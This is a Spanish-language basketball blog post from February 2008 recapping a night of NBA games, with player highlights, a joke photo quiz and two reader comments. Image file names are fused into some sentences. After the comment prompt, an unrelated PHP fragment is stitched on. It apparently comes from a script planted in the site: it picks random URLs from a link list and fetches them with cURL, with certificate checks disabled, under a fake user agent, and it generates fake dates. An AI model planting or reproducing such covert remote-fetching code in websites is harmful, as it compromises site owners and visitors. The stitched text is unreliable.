La crónica (19/02/08)

20 de February de 2008 por MagicJohnson32

Arrancó la segunda mitad de la regular season. Y lo hizo a lo grande, con victorias espectaculares como la de los Nuggets ante los Celtics o la de los Lakers sobre los Hawks en el estreno de Gasol en el Staples Center como jugador local. Repasemos lo más destacado de lo ocurrido en los 10 encuentros disputados anoche después de ver las mejores jugadas.

 

La crónica:

yaobrooks

Los Rockets van de récord. En Cleveland se anotaron, pese al triple-doble de LeBron James, su novena victoria consecutiva como visitante. Yao y McGrady hicieron 9 de 38 en tiros pero Alston y Scola lideraron a su equipo al triunfo 93-85. Otra victoria a domicilio, aunque ésta en la prórroga, fue la que se apuntaron los Knicks en Washington por 113-100. Robinson, Richardson, Crawford, Lee y Randolph anotaron 19 o más puntos cada uno para acabar superando a unos Wizards de nuevo sin Butler ni Arenas y con Jamison como jugador más destacado.

A los Pistons no les sentó bien el lapsus del All-Star y anoche vieron como los Magic acabaron con su racha de diez victorias seguidas con un contundente 103-85 en el Palace de Auburn Hills. Casi más sorprendente resulta el que Orlando venciese en un día muy discreto de Howard y Turkoglu, sus dos mejores jugadores hasta la fecha. Los Wolves ofrecieron algunas muestras del potencial de sus jóvenes jugadores y ganaron a los Sixers por 88-104 con McCants y Jefferson como los más destacados.

El ridículo de la noche estuvo protagonizado por los Bobcats, incapaces de anotar más de 18 puntos en ninguno de los cuatro cuartos de su partido frente a los Spurs. Los campeones no estuvieron mucho mejor pero sí lo suficiente como para ganar deronvswarriorscómodamente, 65-85, un partido gris en el que dejaron a su rival en un 28% en tiros de campo. Todo lo contrario es lo que pudieron ver los espectadores del EnergySolutions Arena, donde los Jazz, liderados por Deron Williams, ofrecieron una exhibición ofensiva en una primera mitad que cerraron con 77 puntos. El rival, claro, eran los Warriors, que perdieron por problemas físicos a Baron Davis y Stephen Jackson y a los que ni siquiera un 32-19 en el periodo final les sirvió para ajustar el tanto más allá del definitivo 109-119.

Tal vez sea porque no está acostumbrado a tener periodos de descanso, pero ayer, en su retorno después de tres semanas de baja por una lesión abdominal, vimos al peor Garnett que recordamos. Su equipo, claro, lo pagó con una derrota en Denver 118-124 pese a que Rondo se unió a Allen y Pierce por encima de los 20 puntos. Los Nuggets anotaron más del 51% de sus tiros liderados por los 28 con 7 rebotes y 9 asistencias de Iverson. En Seattle se disputó un duelo por lo bajo entre Sonics y Grizzlies con victoria local por 101-108. Los Sonics, sin Durant por gripe, tuvieron que remontar 19 puntos en la segunda mitad con grandes actuaciones de Watson y Szscerbiak, mientras que los mejores de Memphis fueron de nuevo Gay y Warrick, además de Navarro, que aportó 16 puntos.

El globo de los Blazers se sigue deshinchando. Ayer perdieron en su casa por 105-94 ante los Kings en el primer partido de los californianosgasoldebutstaples desde la marcha de Bibby. Artest, Martin y García lideraron a su equipo sobre los de Portland, en los que los suplentes Webster y Outlaw fueron los mejores. Mientras tanto se producía el debut de Bibby en los Hawks, en un día para olvidar para él y su nuevo equipo. Atlanta cayó ante los Lakers, que pasaron por encima de su rival, 93-122, y llegaron a acumular una renta de hasta 41 puntos en la primera mitad para vengar así la única derrota encajada desde la llegada de Gasol. En su debut en el Staples como jugador local, el ex barcelonista fue recibido con una gran ovación que él correspondió con 23 puntos, los mismos que Bryant, ambos en 30 minutos de juego, para ampliar la racha de victorias de los Lakers.

Nuestro MVP: Hoy hay que destacar 2 actuaciones completísimas. Por un lado los 28 puntos, 7 rebotes y 9 asistencias de Alleniversonrondo Iverson en la victoria de los Nuggets contra los Celtics, y por otro el triple doble de LeBron James, 26 puntos, 13 rebotes y 11 asistencias.

El rookie: A las buenas actuaciones de Luis Scola, Juan Carlos Navarro y Thaddeus Young, se están uniendo en los últimos días 2 rookies más. El primero, Rodney Stuckey, de los Pistons, que ha anotado 16 puntos, recogido 4 rechaces y repartido 4 asistencias; y también el ala-pívot de los Rockets Carl Landry, que en el número limitado de minutos de los que dispone cada día es capaz de firmar actuaciones como la de hoy con 8 puntos y 6 rebotes.

La sorpresa: Buenos partidos de David Lee y Nate Robinson, que ha salido de titular pidiendo a gritos el relevo de los Marbury, Curry y compañía. También buen partido de Earl Watson y de Wally Szcerbiack, repartiéndose los tiros y el protagonismo que normalmente acapara Kevin Durant. Y por último hay que destacar a Francisco García que no ha esperado a que Artest abandone la franquicia para reivindicarse, 23 puntos y 6 rebotes para él.

La decepción: Eddie Curry sigue decepcionando a cada partido que pasa, Garnett no ha tenido una buena vuelta de su lesión, Billups, RIP y Sheed Wallace han celebrado que los 3 fueron All-Star (injustamente) con uno de sus peores partidos del año. Pero la palma se la lleva Gerald Wallace, que en 32 minutos de juego no ha sido capaz de anotar ninguno de sus 9 lanzamientos. En total los Bobcats ha anotado tan solo 65 puntos.

GlenDavisKenyonPasatiempos: ¿Qué hacen Glen Davis y Kenyon Martin?

A) Practican la Lucha grecoromana

B) Una coreografía de “Fama”

C) Davis, contratado por Geroge Karl, trata de asesinar a Kenyon Martin (y acabar así con su contrato de 16 millones al año hasta 2011)

D) Davis aplica al pie de la letra los métodos de defensa de Bruce Lee Bowen

Respuesta: Qué bien le iría a Denver librarse del contrato de Martin y qué difícil se presenta la tarea. En cualquier caso, suponemos que la intención de Davis, como chico aplicado en defensa que es, no trataba más que frenar a Kenyon Martin en su intento por anotar. El ganador se llevará una colección con las mejores jugadas de Martin, en concreto la del día que firmó el sign & trade para irse a los Nuggets. De crack.

Comenta

2 comentarios a esta entrada

  1. txusma dice:
    #1

    Creeis q Denver cuando firmo a Kenyon ese contrato esperaba de el mas de lo que esta haciendo en estos ultimos partidos?

      Citar

  2. MagicJohnson32 dice:
    #2

    No tengo ni idea de qué pasaba por la cabeza de Vandeweghe cuando le firmó ese contrato a Kenyon Martin. Pero claro, tampoco sé en qué pensaba dos años antes, cuando eligió con el pick 5 del draft a Tskitishvili.

    Tremendo Kiki.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>